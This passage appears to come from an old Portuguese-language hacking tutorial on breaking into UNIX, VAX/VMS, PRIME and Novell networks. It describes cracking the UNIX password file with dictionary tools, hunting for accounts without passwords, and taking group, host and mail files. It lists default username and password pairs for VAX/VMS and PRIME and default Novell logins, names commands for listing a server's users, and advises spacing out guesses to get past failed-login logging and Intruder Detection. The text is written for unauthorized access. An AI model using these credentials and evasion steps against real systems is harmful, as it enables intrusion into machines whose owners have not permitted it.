Esse arquivo muito provávelmente estará encriptado. O password estará escondido e, sem um programa para decriptá-la, a lista será inútil. O programa de decriptação do password UNIX, trabalha em cima de um .dicionário pré moldado, comparando as palavras com o texto encriptado. É bom lembrar que o Brute Force não irá decriptar a lista. Ele irá tentar comparar palavras encriptadas por uma lista de nomes com a lista de passwords. Quando ele encontrar semelhanças (ex. duas palavras iguais com a mesma decriptação) ele para e dá a lista pronta. Brute Force (14,4k) Dictionary Maker (7,73k)

Antes de usar o programa decriptador que não dá certeza de sucesso, tente encontrar um login sem password pois assim, você só precisará digitar o login para entrar no sistema.

Ex.: fou::6789:10: Ricardo Gomes:/home/dir/fou:/bin/fou

Depois da lista de passwords, pegue os seguintes arquivos: /etc/group - É a lista de newsgroups e seus passwords também encriptados. sintaxe - groupname:password:group id:users in group /etc/hosts - É a lista de hosts conectados ao sistemas. Útil quando a conexão é via telenet ou rlogin. /usr/mail/ - É onde estão guardadas as mensagens de cada usuário.
 
 

Sistema VAX/VMS

Para entrar no sistema VAX/VMS, você deve proceder da mesma maneira que fez no UNIX: Arrume a lista de passwords, entre com o login de alguém ou tente os defaults
 
 

Username: ..Password:
system .....operator
system .....manager
system .....system
system .....syslib
operator ...operator
systets ....uetp
systest ....systest
systest ....test
sysmaint ...sysmaint
sysmaint ...service
sysmaint ...digital
field ......field
field ......service
guest ......guest
guest ......sem password
demo .......demo
demo .......sem password
test .......test
decnet .....decnet
 
 

Dentro do sistema não há muito o que fazer. Você pode tentar pegar a lista de passwords em:
SYS$SYSTEM:SYSUAF.DAT, mas normalmente, ela não está disponível para os usuários Tome muito cuidado quando tentar quebrar o sistema VAX's, pois ele guarda todos os bad logins e bad passwords, podendo rastreá-lo na sua próxima tentativa. Se você quiser mesmo tentar, entre com alguns passwords em um dia, espere e tente novamente no dia seguinte...
 
 

Sistema PRIME

Ao entrar no sistema PRIME você deverá fazer as mesmas coisas que fez no UNIX e no VAX's.
 
 

Username: ..Password:
prime ......prime
primos .....primos
primos .....prime
primos_cs ..prime
primos_cs ..primos
primenet ...primenet
system .....system
system .....prime
system .....primos
netlink ....netlink
test .......test
guest ......guest
guest1 .....guest

Rede Novell
1. Entrando no Sistema - Para quebrar a rede Novell você deve utilizar os mesmos recursos que usou para entrar nos sistemas UNIX ou VAX's. Na Novell você também pode tentar alguns defaults. Os defaults da rede Novell são usados para a conexão com portas externas como impressoras, fax e etc..., todos sem password. Abaixo estão alguns defaults:
 
 

Login:
superior
guest
admin
user_template
print
laser
hp_laser
printer
laserwriter
post
mail
gateway
gate
router
backup
wangtek
fax
faxuser
faxworks
test
archivist
chey_archsvr
windows_passthru

Se você conseguir entrar com esses defaults, você pode conseguir a lista com os logins verdadeiros fazendo o seguinte: vá ao diretório SYS:PUBLIC, digite SYSCON e dê enter. Então vá a User Information e veja a lista com todos os logins desse servidor. Esses logins só poderão ser utilizados se estiverem sem password, pois a lista só mostra os nomes. Nunca tente chutar o password de um usuário, pois o computador armazena o numero de vezes que uma senha foi digitada errada e manda para o usuário verdadeiro quando ele se conecta. Esse sistema de segurança se chama Intruder Detection. Se você não conseguir entrar com esses logins, faça o seguinte: no prompt do DOS digite NETX ou VLM, para rodar a rede TSRs e escreva CX /T /A /R. Com isso você, provavelmente conseguirá a lista dos usuários.